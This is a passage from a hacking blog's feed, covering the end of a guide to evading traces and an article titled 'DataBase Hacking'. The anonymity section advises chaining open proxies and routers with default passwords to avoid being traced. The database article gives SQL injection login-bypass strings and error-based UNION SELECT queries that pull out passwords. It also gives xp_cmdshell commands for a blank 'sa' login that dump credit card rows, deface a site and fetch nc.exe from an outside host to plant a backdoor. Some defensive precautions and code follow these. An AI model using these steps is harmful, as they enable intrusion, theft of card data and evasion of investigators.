<p>But beware. Many ISPs make use of technology called transparent proxy servers. These servers are normally located between the ISP’s clients and their main feed to the Internet. These servers pick up on HTTP requests, change the source IP to their own IP and do the reverse upon receiving the return packet. All of this is totally transparent to the end user &#8211; therefore the name. And the servers keep logs. Typically the servers cannot keep logs forever, but the ISP could be backing up logs for analysis. Were I tasked to find a person that sent mail via Hotmail and Anonymizer, I would ask for the transparent proxy logs for the time the user was connected to the web-enabled mailserver, and search for connections to Anonymizer. With any luck it would be the only connection to the Anonymizer in that time frame. Although I won’t be able to prove it, I would find the source IP involved.</p>
<p>Another way of tackling the problem is anonymous remailers. These mailservers will change your source IP, your field and might relay the mail with a random delay. In many cases these remailers are daisy-chained together in a random pattern. The problem with remailers is that many of them do keep logs of incoming connections. Choosing the initial remailer can become an art. Remailers usually have to provide logfiles at the request of the local government. The country of origin of the remailer is thus very important as cyberlaw differs from country to country. A good summary of remailers (complete with listings of remailers) can be found at www.cs.berkeley.edu/~raph/remailer-list.html.</p>
<p>Yet another way is to make use of servers that provide free Unix shell accounts. You can telnet directly to these servers (some provide SSH (encrypted shell) access as well). Most of the free shell providers also provide email facilities, but limit shell capabilities &#8211; e.g. you can’t telnet from the free shell server to another server. In 99% of the cases connections are logged, and logs are kept in backup. A website that lists most free shell providers is to be found at www.leftfoot.com/freeshells.html. Some freeshell servers provide more shell functionality than others &#8211; consult the list for detailed descriptions.</p>
<p>How do we combine all of the above to send email anonymously? Consider this &#8211; I SSH to a freeshell server. I therefore bypass the transparent proxies, and my communication to the server is encrypted and thus invisible to people that might be sniffing my network (locally or anywhere). I use lynx (a text-based web browser) to connect to an Anonymizer service. From the Anonymizer I connect to a free email service. I might also consider a remailer located somewhere in Finland. 100% safe?</p>
<p>Even when using all of above measures I cannot be 100% sure that I cannot be traced. In most cases logs are kept of every move you make. Daisy chaining and hopping between sites and servers does make it hard to be traced, but not impossible.</p>
<p><span style="font-weight: bold;">Other techniques</span></p>
<p>1. The cybercafe is your friend! Although cybercafes are stepping up their security measures it is still relatively easy to walk into a cybercafe without any form of identification. Sit down, and surf to hotmail.com &#8211; no one would notice as everyone else is doing exactly the same thing. Compose your email and walk out. Do not become a regular! Never visit the scene of the crime again. When indulging in other activities such as telnetting to servers or doing a full blast hack cybercafes should be avoided as your activity can raise suspicion with the administrators.</p>
<p>2. Search for proxy-like services. Here I am referring to things like WinGate servers. A WinGate server runs on a Microsoft platform and is used as a proxy server for a small network (read: SOHO environment with a dial-up link). In many cases these servers are not configured correctly and will allow anyone to proxy/relay via them. These servers do not keep any logs by default. Hopping via WinGate servers is so popular that lists of active WinGates are published (www.cyberarmy.com/lists/wingate/).</p>
<p>3. With some experience you can hop via open routers. Finding open routers is very easy &#8211; many routers on the Internet are configured with default passwords (list of default passwords to be found at www.nerdnet.com/security/index.php).</p>
<p>Doing a host scan with port 23 (more on this later) in a “router subnet” would quickly reveal valid candidates. In most of the cases these routers are not configured to log incoming connections, and provide excellent stepping-stones to freeshell servers. You might also consider daisy-chaining them together for maximum protection.</p>
<p>4. Change the communication medium. Connect to an X.25 pad via an XXX service. Find the DTE of a dial-out X.25 PAD. Dial back to your local service provider. Your telephone call now originates from e.g. Sweden. Confused? See the section on X.25 hacking later in the document. The exact same principle can be applied using open routers (see point 3). Some open routers listen on high ports (typically 2001, 3001, X001) and drop you directly into the AT command set of a dial-out modem. Get creative.</p>
<p>The best way to stay anonymous and untraceable on the Internet would be a creative mix of all of the above-mentioned techniques. There is no easy way to be 100% sure all of the time that you are not traceable. The nature of the “hack” should determine how many “stealth” techniques should be used. Doing a simple portscan to a university in Mexico should not dictate that you use 15 hops and 5 different mediums.</p>
<p>For more information read: Breaking into computer networks from the Internet [Roelof Temmingh &amp; SensePost]</p>
<p></span></p>
]]></content:encoded>
			<wfw:commentRss>http://ankitkumaragarwal.com/staying-anonymous-on-net/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>DataBase Hacking</title>
		<link>http://ankitkumaragarwal.com/database-hacking/</link>
		<comments>http://ankitkumaragarwal.com/database-hacking/#comments</comments>
		<pubDate>Mon, 13 Oct 2008 02:47:00 +0000</pubDate>
		<dc:creator>Ankit Kumar Agarwal</dc:creator>
				<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[hacking]]></category>

		<guid isPermaLink="false">http://ankitkumaragarwal.com/?p=8</guid>
		<description><![CDATA[Databases are the heart of a commercial website. An attack on the database servers can cause [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-family:arial,helvetica;font-size:-1;"><span class="edgeatext">Databases are the heart of a commercial website. An attack on the database servers can cause a great monetary loss for the company. Database servers are usually hacked to get credit card information, and just one hack on a commercial site will bring down its reputation and drive away its customers, who also want their credit card info secured. Most commercial websites use Microsoft SQL Server (MSSQL) or Oracle database servers. MSSQL still owns the market because its price is very low, while Oracle servers come with a high price. Some time ago Oracle claimed itself to be “unbreakable”, but hackers took it as a challenge and showed lots of bugs in it too! I have been addicted to hacking database servers for a few months, so I decided to share the knowledge with others. The things discussed here were not discovered by me, ok? Yeah, I experimented with them a lot.<br />
<br /><span class="fullpost"></p>
<p>The article is divided into two parts:<br />
<br />1. Using the HTTP port 80<br />
<br />2. Using the MS SQL port 1434</p>
<p>Part I – Using HTTP port 80 (or better, malformed URLs)<br />
<br />&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</p>
<p>This part will be useful not only to hackers but also to web designers. A common mistake made by web designers can reveal the databases of the server to the hacker. Let's see how. The whole game is about query strings, so it is assumed that the reader has some knowledge of SQL queries and ASP. One more thing: this hack is done using only the browser, so you don't require any tools except IE or Netscape.<br />
<br />Normally, in order to make a login page, the web designer will write the following code.</p>
<p>login.htm<br />
<br /><code>&lt;html&gt;<br />
&lt;body&gt;<br />
&lt;form method="post" action="logincheck.asp"&gt;<br />
&lt;input type="text" name="login_name"&gt;<br />
&lt;input type="text" name="pass"&gt;<br />
&lt;input type="submit" value="sign in"&gt;<br />
&lt;/form&gt;<br />
&lt;/body&gt;<br />
&lt;/html&gt;</code><br />
<br />logincheck.asp<br />
<br /><code>&lt;%@ language="vbscript" %&gt;<br />
&lt;%<br />
dim conn,rs,log,pwd<br />
log=Request.form("login_name")<br />
pwd=Request.form("pass")</p>
<p>set conn = Server.CreateObject("ADODB.Connection")<br />
conn.ConnectionString="provider=microsoft.jet.OLEDB.4.0;data source=c:\folder\multiplex.mdb"<br />
conn.Open<br />
set rs = Server.CreateObject("ADODB.Recordset")<br />
' the two form values are concatenated straight into the SQL text<br />
rs.open "Select * from table1 where login='"&amp;log&amp;"' and password='"&amp;pwd&amp;"' ", conn<br />
If rs.EOF Then<br />
    response.write("Login failed")<br />
else<br />
    response.write("Login successful")<br />
End if<br />
%&gt;</code></p>
<p>Looking at the above code, at first sight it seems OK. A user will type his login name and password in the login.htm page and click the submit button. The values of the text boxes will be passed to the logincheck.asp page, where they will be checked using the query string. If no entry satisfies the query, the recordset will be at end of file and a "Login failed" message will be displayed. Everything seems to be OK. But wait a minute. Think again. Is everything really OK?!! What about the query?!! Is it OK? Well, if you have made a page like this, then a hacker can easily log in successfully without knowing the password. How? Let's look at the query again.</p>
<p>"Select * from table1 where login='"&amp;log&amp;"' and password='"&amp;pwd&amp;"' "</p>
<p>Now if a user types his login name as "Chintan" and password as "h4x3r", then these values will be passed to the ASP page with the post method and the above query will become</p>
<p>"Select * from table1 where login='Chintan' and password='h4x3r'"</p>
<p>That's fine. There will be an entry with Chintan and h4x3r in the login and password fields in the database, so we will receive a "Login successful" message. Now what if I type the login name as "Chintan" and<br />
<br />hi' or 'a'='a<br />
<br />in the password text box? The query will become as follows:</p>
<p>"Select * from table1 where login='Chintan' and password='hi' or 'a'='a'"</p>
<p>Submit and bingo!!!!! I get the message "Login successful"!! Did you see the smartness of the hacker, which was due to the carelessness of the web designer?!!<br />
<br />The query is satisfied because its meaning has changed: now either the password needs to be 'hi' or 'a' needs to be equal to 'a'. Clearly the password is not 'hi', but at the same time 'a'='a', so the condition is satisfied and the hacker is in with login "Chintan"!! You can try the following in the password text box if the above doesn't work for some websites:</p>
<p>hi" or "a"="a<br />
<br />hi" or 1=1 --<br />
<br />hi' or 1=1 --<br />
<br />hi' or 'a'='a<br />
<br />hi') or ('a'='a<br />
<br />hi") or ("a"="a</p>
<p>Here the -- above turns the rest of the query string into a comment, so the other conditions will not be checked. Similarly you can provide</p>
<p>Chintan' --<br />
<br />Chintan" --</p>
<p>or other such possibilities in the login name text box, and anything as the password, which might let you in, because in the query string only the login name is checked as "Chintan" and the rest is ignored due to --. Well, if you are lucky enough to get a website where the web designer has made the above mistake, then you will be able to log in as any user!!!</p>
<p>IMP NOTE: Hey guys, I have put up a page where you can experiment for yourself with the SQL injection vulnerability. Just go to www33.brinkster.com/chintantrivedi/login.htm</p>
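<p>As an added example, not code from the article: the logincheck.asp query rebuilt in Python over an in-memory SQLite table (standing in for the Access .mdb), with the article's concatenated form beside a parameterised one, so the hi' or 'a'='a password and the Chintan' -- login name can be checked against both. The table and its single row are constructed for the demo.</p>

```python
"""Added example (not the article's code): logincheck.asp's query rebuilt in
Python over SQLite, once by string concatenation (the article's form) and
once with a parameterised query, to show why the article's payloads pass the
first check and fail the second. Table contents are constructed for the demo."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for table1 holding one user (Chintan / h4x3r)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE table1 (login TEXT, password TEXT)")
    conn.execute("INSERT INTO table1 VALUES ('Chintan', 'h4x3r')")
    conn.commit()
    return conn


def build_query_concatenated(log: str, pwd: str) -> str:
    """Exactly what rs.open receives in logincheck.asp: user input spliced into
    the SQL text, so quotes in the input become part of the SQL syntax."""
    return ("Select * from table1 where login='" + log
            + "' and password='" + pwd + "'")


def login_vulnerable(conn: sqlite3.Connection, log: str, pwd: str) -> bool:
    """The article's check: build the SQL by concatenation and run it.
    A non-empty result is the 'not rs.EOF' branch -> 'Login successful'."""
    rows = conn.execute(build_query_concatenated(log, pwd)).fetchall()
    return len(rows) > 0


def login_parameterised(conn: sqlite3.Connection, log: str, pwd: str) -> bool:
    """Hardened check: the SQL text is fixed and the driver binds the two
    values, so a quote or -- inside the input is data, never syntax."""
    rows = conn.execute(
        "SELECT * FROM table1 WHERE login = ? AND password = ?", (log, pwd)
    ).fetchall()
    return len(rows) > 0


if __name__ == "__main__":
    db = make_db()
    payload = "hi' or 'a'='a"          # the password from the article
    print(build_query_concatenated("Chintan", payload))
    print("concatenated :", login_vulnerable(db, "Chintan", payload))
    print("parameterised:", login_parameterised(db, "Chintan", payload))
```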
<p>More advanced hacking of databases using ODBC error messages!!!<br />
<br />&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>Above we saw how to log in successfully without knowing the password. Now I will show you how to read the whole database just by using queries in the URL!! This works only for IIS, i.e. ASP pages, and we know that IIS covers almost 35% of the web market, so you will definitely get a victim after searching just a few websites. You might have seen something like</p>
<p><a href="http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45" target="_blank">http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45</a></p>
<p>in the URLs. The '?' there shows that after it the value 45 is passed to a hidden variable id. If you don't understand, recall the above example: login.htm had two text inputs named 'login_name' and 'pass', and their values were passed to the logincheck.asp page. The same thing can be done by directly opening the logincheck.asp page using<br />
<br /><a href="http://neworder.box.sk/redirect.php?http://www.nosecurity.com/logincheck.asp?login_name=Chintan&amp;pass=h4x3r" target="_blank">http://neworder.box.sk/redirect.php?http://www.nosecurity.com/logincheck.asp?login_name=Chintan&amp;pass=h4x3r</a><br />
<br />in the URL, if method="get" is used instead of method="post".</p>
<p>Note: the difference between the get and post methods is that the post method doesn't show the values passed to the next page in the URL, while the get method does. To understand how they work internally, read the HTTP protocol RFCs, RFC 1945 and RFC 2616.</p>
<p>What I mean to say is that after '?' the variables which are going to be used in that page are assigned their values. As above, login_name is given the value Chintan. Different variables are separated by the '&amp;' operator.</p>
<p>OK, so coming back: id will mostly be a hidden variable, and according to the links you click its value will change. This value of id is then passed into the query in the mypage.asp page, and according to the results you get the desired page on your screen. If you just change the value of id to 46, you will get a different page.<br />
<br />Now let's start hacking the database. Let's use the magic of queries. Just type</p>
<p><a href="http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45" target="_blank">http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45</a> UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--</p>
<p>in the URL. INFORMATION_SCHEMA.TABLES is a system table which contains information about all the tables of the server. In it there is a field TABLE_NAME which contains the names of all the tables. See the query again<br />
<br />SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES<br />
<br />The result of this query is the first table name from the INFORMATION_SCHEMA.TABLES table. But the result we get is a table name, which is a string (nvarchar), and we are uniting it with 45 (integer) by UNION, so we will get an error message such as</p>
<p>Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'logintable' to a column of data type int. /mypage.asp, line</p>
<p>From the error it's clear that the first table is 'logintable'. It seems that this table might contain login names and passwords <img src='http://ankitkumaragarwal.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> So let's move into it. Type the following in the URL</p>
<p><a href="http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45" target="_blank">http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45</a> UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--</p>
<p>Output:<br />
<br />Microsoft OLE DB Provider for ODBC Drivers error '80040e07'<br />
<br />[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar<br />
<br />value 'login_id' to a column of data type int.<br />
<br />/index.asp, line 5</p>
<p>The above error message shows that the first field or column in logintable is login_id. To get the next column name we will type</p>
<p><a href="http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45" target="_blank">http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45</a> UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id')--</p>
<p>Output:<br />
<br />Microsoft OLE DB Provider for ODBC Drivers error '80040e07'<br />
<br />[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar<br />
<br />value 'login_name' to a column of data type int.<br />
<br />/index.asp, line 5</p>
<p>So we get one more field name, 'login_name'. To get the third field name we will write</p>
<p><a href="http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45" target="_blank">http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45</a> UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id','login_name')--</p>
<p>Microsoft OLE DB Provider for ODBC Drivers error '80040e07'<br />
<br />[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar<br />
<br />value 'passwd' to a column of data type int.<br />
<br />/index.asp, line 5</p>
<p>That's it. We ultimately get the 'passwd' field. Now let's get the login names and passwords from this table "logintable". Type</p>
<p><a href="http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45" target="_blank">http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45</a> UNION SELECT TOP 1 login_name FROM logintable--</p>
<p>Output:<br />
<br />Microsoft OLE DB Provider for ODBC Drivers error '80040e07'<br />
<br />[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar<br />
<br />value 'Rahul' to a column of data type int.<br />
<br />/index.asp, line 5</p>
<p>That's the login name "Rahul", and to get the password of Rahul the query would be</p>
<p><a href="http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45" target="_blank">http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45</a> UNION SELECT TOP 1 passwd FROM logintable<br />
<br />where login_name='Rahul'--</p>
<p>Output:<br />
<br />Microsoft OLE DB Provider for ODBC Drivers error '80040e07'<br />
<br />[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar<br />
<br />value 'P455w0rd' to a column of data type int.<br />
<br />/index.asp, line 5</p>
<p>Voila!! Login name: Rahul and password: P455w0rd. You have cracked the database of www.nosecurity.com. And it was possible because the user's request was not checked properly. SQL injection vulnerabilities still exist on many websites. The best solution is to parse the user requests and filter out characters such as ', ", --, :, etc.</p>
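<p>As an added example that is not part of the article: a detection pass a defender could run over web server logs to spot the error-based UNION SELECT / INFORMATION_SCHEMA probing and the quote-or-tautology logins shown above. The IIS W3C-style log lines, their field order and the assumption that the ODBC error page came back as HTTP 500 are constructed for the demo.</p>

```python
"""Added example (not from the article): flag the probe patterns used in the
article in IIS-style web server log lines. Sample lines, the field layout and
the "error page == HTTP 500" assumption are constructed for this demo; real
logs may order fields differently, so read the #Fields: header first."""
import re
from urllib.parse import unquote_plus

# Constructed sample log. Field order (assumed):
#   date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2008-10-13 02:47:00 10.0.0.5 GET /mypage.asp id=45 200
2008-10-13 02:47:09 10.0.0.5 GET /mypage.asp id=46 200
2008-10-13 02:47:31 10.0.0.9 GET /mypage.asp id=45+UNION+SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES-- 500
2008-10-13 02:47:55 10.0.0.9 GET /mypage.asp id=45%20UNION%20SELECT%20TOP%201%20COLUMN_NAME%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%3D%27logintable%27-- 500
2008-10-13 02:48:10 10.0.0.9 GET /logincheck.asp login_name=Chintan&pass=hi%27+or+%27a%27%3D%27a 200
2008-10-13 02:48:20 10.0.0.7 GET /logincheck.asp login_name=Chintan&pass=h4x3r 200
"""

# Each rule matches one probe shape from the article; they run against the
# decoded, whitespace-collapsed, upper-cased query string.
RULES = [
    ("union-select",       re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b")),
    ("information-schema", re.compile(r"\bINFORMATION_SCHEMA\.(TABLES|COLUMNS)\b")),
    ("quote-or-tautology", re.compile(r"'\s*OR\s+'?\w+'?\s*=\s*'?\w+")),
    ("trailing-comment",   re.compile(r"--\s*$")),
]


def normalise(query: str) -> str:
    """Undo %xx and '+' encoding, collapse whitespace, upper-case for matching."""
    return re.sub(r"\s+", " ", unquote_plus(query)).strip().upper()


def parse_line(line: str):
    """Split one log line into a dict; None for comment lines or odd layouts."""
    if not line or line.startswith("#"):
        return None
    parts = line.split(" ")
    if len(parts) != 7:
        return None
    date, time, c_ip, method, stem, query, status = parts
    return {"time": f"{date} {time}", "ip": c_ip, "method": method,
            "stem": stem, "query": query, "status": int(status)}


def scan_line(line: str):
    """Names of the rules that fire on this line (empty list if clean)."""
    rec = parse_line(line)
    if rec is None:
        return []
    text = normalise(rec["query"])
    return [name for name, rx in RULES if rx.search(text)]


def scan_log(log: str):
    """Run every rule over every line. Each hit records the client, the decoded
    query, the rules that fired and whether the server answered 500 (assumed
    here to be the ASP/ODBC error page the probe is fishing for)."""
    hits = []
    for line in log.splitlines():
        rules = scan_line(line)
        if rules:
            rec = parse_line(line)
            hits.append({"time": rec["time"], "ip": rec["ip"], "stem": rec["stem"],
                         "query": unquote_plus(rec["query"]), "rules": rules,
                         "error_page": rec["status"] == 500})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        flag = "ERROR-PAGE" if hit["error_page"] else "ok-status"
        print(hit["time"], hit["ip"], flag, hit["stem"], hit["rules"])
        print("    ", hit["query"])
```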
<p>Part II – Using port 1434 (SQL port)<br />
<br />&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</p>
<p>Well, up till now we have seen how to break into the database using malformed URLs, but that was done using just port 80 (the HTTP port). This time we will use port 1434 for hacking. Before that we will see what database servers actually are and how they work, and then how to exploit them!</p>
<p>The designers of MS SQL shipped some default stored procedures along with the product to make things flexible for web designers. A procedure is nothing but a function which can be used to perform some action on the arguments passed to it. These procedures are very important to hackers. Some of the important ones are</p>
<p>sp_password -> Changes the password for a specific login name.<br />
<br />e.g. EXEC sp_password 'oldpass', 'newpass', 'username'</p>
<p>sp_tables -> Shows all the tables in the current database.<br />
<br />e.g. EXEC sp_tables</p>
<p>xp_cmdshell -> Runs an arbitrary command on the machine with administrator privileges. (most imp)</p>
<p>xp_msver -> Shows the MS SQL Server version including all the info about the OS.<br />
<br />e.g. master..xp_msver</p>
<p>xp_regdeletekey -> Deletes a registry key.</p>
<p>xp_regdeletevalue -> Deletes a registry value.</p>
<p>xp_regread -> Reads a registry value.</p>
<p>xp_regwrite -> Writes a registry key.</p>
<p>xp_terminate_process -> Stops a process.</p>
<p>Well, these are some of the important procedures. Actually there are more than 50 such procedures. If you want your MS SQL Server to be protected then I would recommend deleting all of these procedures. The trick is to open the Master database using MS SQL Server Enterprise Manager, expand the Extended Stored Procedures folder, and delete each stored procedure with right click and delete.</p>
<p>Note: "Master" is an important database of the SQL server which contains all the system information, such as login names and system stored procedures. So if a hacker deletes this master database then the SQL server will be down for ever. Syslogins is the default system table which contains the usernames and passwords of the logins in the database.</p>
<p>Most dangerous threat: Microsoft SQL Server has the default username "sa" with a blank password "". This has ruined lots of MS SQL servers in the past. Even a virus exploiting this vulnerability had been released.</p>
<p>That's enough. Let's hack now. First we need to find a vulnerable server. Download a good port scanner (there are many out there on the web) and scan for IP addresses with port 1433/1434 (TCP or UDP) open. This is the MS SQL port which runs the SQL service. Oracle's port no. is 1521. Let's suppose we got a vulnerable server with IP 198.188.178.1 (it's just an example, so don't even try it). Now there are many ways to use the SQL service, like telnet or netcat to port 1433/1434. You can also use a tool known as osql.exe which ships with any SQL Server 2000. OK. Now go to the DOS prompt and type.<br />
<br /><code>C:>osql.exe -?<br />
osql: unknown option ?<br />
usage: osql              [-U login id]          [-P password]<br />
  [-S server]            [-H hostname]          [-E trusted connection]<br />
  [-d use database name] [-l login timeout]     [-t query timeout]<br />
  [-h headers]           [-s colseparator]      [-w columnwidth]<br />
  [-a packetsize]        [-e echo input]        [-I Enable Quoted Identifiers]<br />
  [-L list servers]      [-c cmdend]<br />
  [-q "cmdline query"]   [-Q "cmdline query" and exit]<br />
  [-n remove numbering]  [-m errorlevel]<br />
  [-r msgs to stderr]    [-V severitylevel]<br />
  [-i inputfile]         [-o outputfile]<br />
  [-p print statistics]  [-b On error batch abort]<br />
  [-O use Old ISQL behavior disables the following]<br />
      &lt;EOF&gt; batch processing<br />
      Auto console width scaling<br />
      Wide messages<br />
      default errorlevel is -1 vs 1<br />
  [-? show syntax summary]</code><br />
<br />Well, this displays the help of the osql tool. It's clear from the help what we have to do now. Type</p>
<p>C:\> osql.exe –S                    198.188.178.1 –U sa –P “”<br />
<br />1><br />
<br />Thats what we get if we                    login successfully else we will get an error message as login                    failed for user “sa”</p>
<p>Now if we want to execute any                    command on the remote machine then just use the “xp_cmdshell”                    default stored procedure.</p>
<p>C:\> osql.exe –S                    198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘dir                    >dir.txt’”</p>
<p>I would prefer to use –Q option instead                    of –q because it exits after executing the query. In the same                    manner we can execute any command on the remote machine. We                    can even upload or download any files on/from the remote                    machine. A smart attacker will install a backdoor on the                    machine to gain access to in future also. Now as I had                    explained earlier we can use the “information_schema.tables”                    to get the list of tables and contents of it.</p>
<p>C:\>                    osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from                    information_schema.tables”</p>
<p>In the list of table names, look for something like login, accounts or users that is likely to hold sensitive data such as credit card numbers.</p>
<p>C:\> osql.exe -S 198.188.178.1 -U sa -P "" -Q "select * from users"</p>
<p>and</p>
<p>C:\> osql.exe -S 198.188.178.1 -U sa -P "" -Q "select username, creditcard, expdate from users"</p>
<p>Output:<br />
<br /><code><br />
Username     creditcard         expdate<br />
-----------  ----------------   -----------------------<br />
Jack         5935023473209871   2004-10-03 00:00:00.000<br />
Jill         5839203921948323   2004-07-02 00:00:00.000<br />
Micheal      5732009850338493   2004-08-07 00:00:00.000<br />
Ronak        5738203981300410   2004-03-02 00:00:00.000<br />
</code><br />
<br />Want to write something into the site's index.html?</p>
<p>C:\> osql.exe -S 198.188.178.1 -U sa -P "" -Q "exec master..xp_cmdshell 'echo defaced by Chintan > C:\inetpub\wwwroot\index.html'"</p>
<p>Want to upload a file to the remote system?</p>
<p>C:\> osql.exe -S 198.188.178.1 -U sa -P "" -Q "exec master..xp_cmdshell 'tftp -i 203.192.16.12 GET nc.exe c:\nc.exe'"</p>
<p>Add -i to the tftp command: it selects binary (image) mode, and without it the Windows tftp client transfers in ASCII mode and corrupts an executable. To pull a file back from the remote machine, use PUT instead of GET. Remember that the command runs on the remote machine, not on ours: GET makes the remote machine fetch nc.exe from our TFTP server, and PUT makes it send a file to our server.</p>
<p>That is not all. Tools for brute-forcing SQL Server login passwords are easy to find on the web, and buffer overflows keep being discovered that give an attacker complete control of the system with administrator privileges. This article only touches on some general issues with database servers.</p>
<p>Remember the Sapphire (SQL Slammer) worm, released on 25 January 2003? It exploited a buffer overflow in the SQL Server 2000 Resolution Service, one of the three flaws Microsoft had fixed six months earlier in MS02-039, and spread with a single UDP packet to port 1434.</p>
<p>Precautionary measures<br />
<br />&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
<br /><code><br />
<*>    Change the default (blank) password for sa, and do not let applications connect as sa.<br />
<*>    Disable or remove the extended stored procedures you do not need, starting with xp_cmdshell; deleting every default stored procedure would break the server.<br />
<*>    Filtering characters such as ' " -- ; : is not a defence on its own (a numeric field needs no quotes at all); use parameterized queries for every value that reaches SQL.<br />
<*>    Keep up to date with patches.<br />
<*>    Block ports 1433/1434 (MS SQL) and 1521 (Oracle) at the firewall.<br />
</code></p>
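<p>The third precaution above (filter out dangerous characters) is weaker than it looks. The following added example is not part of the original article: it uses Python's built-in sqlite3 module as a stand-in for SQL Server and a constructed users table modelled on the output above (the card numbers are fake) to show that the blacklist turns a quoted payload into a working unquoted one, while a parameterized query with type validation rejects it.</p>

```python
import sqlite3

# Characters the precaution list says to filter out (constructed blacklist).
BLACKLIST = ("'", '"', "--", ";", ":")

# Constructed rows modelled on the output above; the card numbers are fake.
SAMPLE_USERS = [
    (1, "Jack", "0000000000000001", "2004-10-03"),
    (2, "Jill", "0000000000000002", "2004-07-02"),
    (3, "Micheal", "0000000000000003", "2004-08-07"),
    (4, "Ronak", "0000000000000004", "2004-03-02"),
]


def make_db():
    """In-memory stand-in for the users table the article dumps."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "create table users (id integer primary key, username text,"
        " creditcard text, expdate text)"
    )
    conn.executemany("insert into users values (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def blacklist_filter(value):
    """Strip the blacklisted characters, as the precaution suggests."""
    for bad in BLACKLIST:
        value = value.replace(bad, "")
    return value


def lookup_blacklisted(conn, user_id):
    """Vulnerable: filters, then pastes the text straight into the SQL."""
    sql = ("select username from users where id = "
           + blacklist_filter(user_id) + " order by id")
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, user_id):
    """Fixed: check the type, then bind the value instead of concatenating."""
    try:
        uid = int(user_id)
    except ValueError:
        return []
    rows = conn.execute(
        "select username from users where id = ? order by id", (uid,)
    )
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    payload = "1' OR '1'='1"
    # The filter removes the quotes and leaves "1 OR 1=1", which still injects.
    print("blacklist:", lookup_blacklisted(db, payload))
    # The parameterized version never treats the payload as SQL.
    print("parameterized:", lookup_parameterized(db, payload))
```

<p>The point of the example is the second query function: once the value is bound as a parameter, the database engine never parses it as SQL, so no list of forbidden characters has to be complete.</p>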
<p>Remember, security is not an add-on feature; it depends on the diligence of the administrator. The contest between attacker and administrator will go on and on, and the side that keeps up with the latest advisories and bug reports wins. Database administrators should follow sites such as</p>
<p><a href="http://neworder.box.sk/redirect.php?http://sqlsecurity.com" target="_blank">http://neworder.box.sk/redirect.php?http://sqlsecurity.com</a><br />
<br /><a href="http://neworder.box.sk/redirect.php?http://www.cert.com" target="_blank">http://neworder.box.sk/redirect.php?http://www.cert.com</a>                    </p>
<p>Credits: unknown<br />
<br /></span></span></span></p>
]]></content:encoded>
			<wfw:commentRss>http://ankitkumaragarwal.com/database-hacking/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Windows FTP Hacking</title>
		<link>http://ankitkumaragarwal.com/windows-ftp-hacking/</link>
		<comments>http://ankitkumaragarwal.com/windows-ftp-hacking/#comments</comments>
		<pubDate>Sun, 12 Oct 2008 12:08:00 +0000</pubDate>
		<dc:creator>Ankit Kumar Agarwal</dc:creator>
				<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[ftp]]></category>
		<category><![CDATA[hacking]]></category>

		<guid isPermaLink="false">http://ankitkumaragarwal.com/?p=5</guid>
